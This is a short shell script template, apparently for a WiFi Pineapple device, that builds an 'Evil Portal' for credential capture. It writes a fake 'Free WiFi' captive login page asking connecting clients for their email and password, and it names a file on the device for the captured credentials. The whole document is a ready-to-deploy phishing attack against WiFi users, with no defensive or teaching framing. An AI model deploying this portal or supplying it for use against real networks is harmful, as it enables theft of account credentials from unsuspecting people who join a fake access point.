# ============================================
# PINEAPPLE EVIL PORTAL - Credential Capture
# ============================================
# Purpose: Create fake captive portal
# Target: WiFi clients connecting to fake AP
# Device: Pineapple Pager
# Time: Persistent
# Author: D3n14l0f53rv1c3
# ============================================

# This is a template for Pineapple Evil Portal
# Deploy via Pineapple web UI at http://192.168.68.109:1471

# Portal HTML template
PORTAL_NAME="FreeWiFi"
CAPTURE_FILE="/pineapple/captures/credentials.txt"

# Create portal directory
mkdir -p /pineapple/modules/evilportals/FreeWiFi

# Portal configuration
cat > /pineapple/modules/evilportals/FreeWiFi/index.html << 'PORTAL'
<!DOCTYPE html>
<html>
<head>
    <title>Free WiFi - Login Required</title>
    <style>
        body { font-family: Arial; background: #f0f0f0; text-align: center; padding: 50px; }
        .container { background: white; padding: 30px; border-radius: 10px; max-width: 400px; margin: auto; }
        input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; }
        button { background: #0078d7; color: white; padding: 12px 30px; border: none; border-radius: 5px; }
    </style>
</head>
<body>
    <div class="container">
        <h2>📶 Free WiFi</h2>
        <p>Please login to continue</p>
        <form action="/login" method="POST">
            <input type="email" name="email" placeholder="Email" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Connect</button>
        </form>
        <p style="font-size: 12px; color: #666;">By connecting, you agree to our terms</p>
    </div>
</body>
</html>
PORTAL

echo "✅ Evil Portal created at /pineapple/modules/evilportals/FreeWiFi/"
